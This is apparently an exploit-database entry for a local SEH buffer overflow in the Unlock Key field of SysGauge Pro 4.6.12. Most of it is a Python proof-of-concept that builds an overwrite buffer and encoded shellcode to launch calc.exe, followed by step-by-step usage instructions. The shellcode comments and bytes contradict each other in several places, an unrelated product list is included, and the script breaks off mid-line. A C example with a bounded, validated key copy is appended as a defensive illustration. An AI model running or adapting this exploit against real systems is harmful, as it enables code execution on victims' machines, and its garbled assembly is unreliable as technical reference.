# SysGauge Pro 4.6.12 - Local Buffer Overflow (SEH)

## Vulnerability Overview

Vulnerability type: Local Buffer Overflow
Affected software: SysGauge Pro v4.6.12
Description: With "FakeLabel" entered in the Customer Name field under Register, the Unlock Key field is subject to a buffer overflow. An attacker can supply crafted data that overwrites the SEH (Structured Exception Handler) record and executes arbitrary code.
Exploitation: copy the generated payload into the Unlock Key field and click Register.

## Scope

Platform: Windows
Test environment: Windows XP Professional - SP3
Published: 2018-04-16

## Remediation

The page gives no specific patch or fix; contact the vendor for an update or upgrade to a secure version.

## POC / Exploit Code

```python
#!/usr/bin/python
###############################################################################
# Exploit Title       : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH)
# Exploit Author      : Hashim Jawad
# Twitter             : @hackfalafel
# Author Website      : hackfalafel.com
# Vendor Homepage     : http://www.sysgauge.com/
# Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe
# Tested on           : Windows XP Professional - SP3
# Steps to reproduce  :
#   - Copy content of payload.txt
#   - Under Register, type in 'FakeLabel' in Customer Name field
#   - Paste the content of payload.txt in Unlock Key field and click Register
###############################################################################
import struct

# SyncBreeze Ultimate v10.7.14
# DiskPulse Pro v10.7.14
# DiskPulse Ultimate v10.7.14
# DiskSavvy Pro v10.7.14
# DiskSavvy Ultimate v10.7.14
# DiskSorter Pro v10.7.14
# DiskSorter Ultimate v10.7.14
# DupScout Pro v10.7.14
# DupScout Ultimate v10.7.14
# VX Search Pro v10.7.14
# VX Search Ultimate v10.7.14
###############################################################################

# overwrite SEH with clean address of [pop, pop, ret]
buffer  = "\x41" * 700                    # junk to nSEH
buffer += "\x74\x86\x04\x04"              # nSEH - jump if zero flag is set (always true)
buffer += struct.pack('<i', 0x00103d16)   # SEH (pop esi pop ecx ret in ...)
buffer += "\x43" * 28                     # 28 more junk

# push calc.exe instructions [encoded] into the stack
# Disassembly:
#   0:  33 c0              xor eax,eax          ; zero out eax register
#   2:  50                 push eax             ; push eax (null-byte) to terminate "calc.exe"
#   3:  68 2E 05 78 05     push "exe"           ; push the ASCII string to the stack
#   8:  68 63 61 6c 63     push "calc"
#   d:  bb c4              mov eax,esp          ; put the pointer to the ASCII string in eax
#   f:  6a 81              push 0x81            ; push uCmdShow parameter to the stack
#  11:  50                 push eax             ; push the pointer to lpCmdLine to the stack
#  12:  bb 5d 2b 08 7c     mov ebx,0x7c082b5d   ; move the pointer to WinExec() [located at 0x7c082b5d
#                                               ;   in kernel32.dll (via advapi.exe) on W32P SP3] into ebx
#  17:  ff d3              call ebx             ; call WinExec()

# divide calc.exe instructions to 4-byte chunks and pad what's left with nops
#   "\x33\xc0\x50\x68"
#   "\x74\x86\x04\x04"
#   "\x68\x63\x61\x6c\x63"
#   "\xbb\xc4"
#   "\x6a\x81"
#   "\x50"
#   "\x5d\x2b\x08\x7c"
#   "\xff\xd3"
# starting from the bottom up in little endian order

# first push "\x5d\x2b\x08\x7c"
buffer += "\x33\xc0\x50\x68"
buffer += "\x74\x86\x04\x04"
buffer += "\x68\x63\x61\x6c\x63"
buffer += "\xbb\xc4"
buffer += "\x6a\x81"
buffer += "\x50"
buffer += "\x5d\x2b\x08\x7c"
# zero out eax
buffer += "\x25\x10\x10\x10\x10"   # and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"   # and eax, 0x01010101
# move "\x68\x63\x61\x6c\x63" into eax and push it to the stack
buffer += "\x85\x72\x70\x78\x78"   # add eax, 0x78707872
buffer += "\x85\x01\x20\x20\x20"   # add eax, 0x20202001
buffer += "\x50"                   # push eax

# second push "\xff\xd3\x7c\x08"
buffer += "\xff\xd3\x7c\x08"
# zero out eax
buffer += "\x25\x10\x10\x10\x10"   # and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"   # and eax, 0x01010101
# move "\xff\xd3\x7c\x08" into eax and push it to the stack
buffer += "\x85\x01\x32\x35\x60"   # add eax, 0x65353101
buffer += "\x85\x15\x32\x35\x60"   # add eax, 0x65353215
buffer += "\x85\x15\x22\x12\x33"   # add eax, 0x33221515
buffer += "\x50"                   # push eax

# third push "\x5d\x2b\x08\x7c"
buffer += "\x5d\x2b\x08\x7c"
# zero out eax
buffer += "\x25\x10\x10\x10\x10"   # and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"   # and eax, 0x01010101
# move "\x5d\x2b\x08\x7c" into eax and push it to the stack
buffer += "\x85\x01\x30\x65\x50"   # add eax, 0x65300101
buffer += "\x85\x01\x20\x50\x27"   # add eax, 0x27502001
buffer += "\x40"                   # dec eax
buffer += "\x50"                   # push eax

# fourth push "\x6a\x81\xbb\xc4"
buffer += "\x6a\x81\xbb\xc4"
# zero out eax
buffer += "\x25\x10\x10\x10\x10"   # and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"   # and eax, 0x01010101
# move "\x6a\x81\xbb\xc4" into eax and push it to the stack
buffer += "\x85\x32\x40\x35\x35"   # add eax, 0x35403532
buffer += "\x85\x31\x43\x78\x33"   # add eax, 0x37843315
buffer += "\x50"                   # push eax

# fifth push "\x68\x63\x61\x6c"
buffer += "\x68\x63\x61\x6c"
# zero out eax
buffer += "\x25\x10\x10\x10\x10"   # and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"   # and eax, 0x01010101
# move "\x68\x63\x61\x6c" into eax and push it to the stack
buffer += "\x85\x34\x32\x31\x34"   # add eax, 0x34313234
buffer += "\x85\x34\x31\x30\x30"   # add eax, 0x30313434
buffer += "\x50"                   # push eax

# sixth push "\x68\x74\x86\x04"
buffer += "\x68\x74\x86\x04"
# zero out eax
buffer += "\x25\x10\x10\x10\x10"   # and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"   # and eax, 0x01010101
# move "\x68\x74\x86\x04" into eax and push it to the stack
buffer += "\x85\x17\x33\x34\x31"   # add eax, 0x34331715
buffer += "\x85\x17\x32\x44\x32"   # add eax,
```
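Added example, not the vendor's code and not part of the original advisory: the hardened form of the input handling this bug class needs, a bounded copy of the Unlock Key into a fixed-size stack buffer, checked against a constructed input with the layout the page describes (700 bytes to nSEH, 4 bytes nSEH, 4 bytes SEH, 28 bytes of junk). The 64-byte key limit and the key alphabet are assumptions; the real sizes are not on the page.

```c
#include <stddef.h>
#include <string.h>
#include <ctype.h>

/* Hypothetical licence-key limit; SysGauge's real buffer size is not on the page. */
#define UNLOCK_KEY_MAX 64

enum key_result { KEY_OK = 0, KEY_EMPTY = 1, KEY_TOO_LONG = 2, KEY_BAD_CHAR = 3 };

/* Hardened copy into a fixed-size buffer: the length is checked before any byte
 * is written, the result is always NUL-terminated, and only an assumed key
 * alphabet (alphanumerics and '-') is accepted. The length check is the
 * memory-safety control; the alphabet check is input hygiene, nothing more. */
enum key_result copy_unlock_key(char *dst, size_t dstlen, const char *src) {
    size_t n = 0;
    while (n < dstlen && src[n] != '\0')   /* bounded scan: never read past dstlen */
        n++;
    if (n == 0) return KEY_EMPTY;
    if (n >= dstlen) return KEY_TOO_LONG;  /* one byte is reserved for the terminator */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)src[i];
        if (!isalnum(c) && c != '-') return KEY_BAD_CHAR;
    }
    memcpy(dst, src, n);
    dst[n] = '\0';
    return KEY_OK;
}

/* File-scope destination so the stored value can be inspected after the call. */
static char g_key[UNLOCK_KEY_MAX];

enum key_result try_key(const char *src) { return copy_unlock_key(g_key, sizeof g_key, src); }
const char *stored_key(void) { return g_key; }

/* Constructed input with the page's layout: 700 bytes of junk to nSEH, 4 bytes
 * for nSEH, 4 bytes for SEH, 28 bytes of junk (736 bytes total). Only filler
 * characters are used, no opcodes or addresses. Returns 1 when the hardened
 * copy rejects it before anything reaches the stack buffer. */
int page_layout_payload_rejected(void) {
    char payload[700 + 4 + 4 + 28 + 1];
    memset(payload, 'A', 700);          /* junk to nSEH */
    memset(payload + 700, 'B', 8);      /* nSEH and SEH slots */
    memset(payload + 708, 'C', 28);     /* trailing junk */
    payload[736] = '\0';
    return try_key(payload) == KEY_TOO_LONG;
}
```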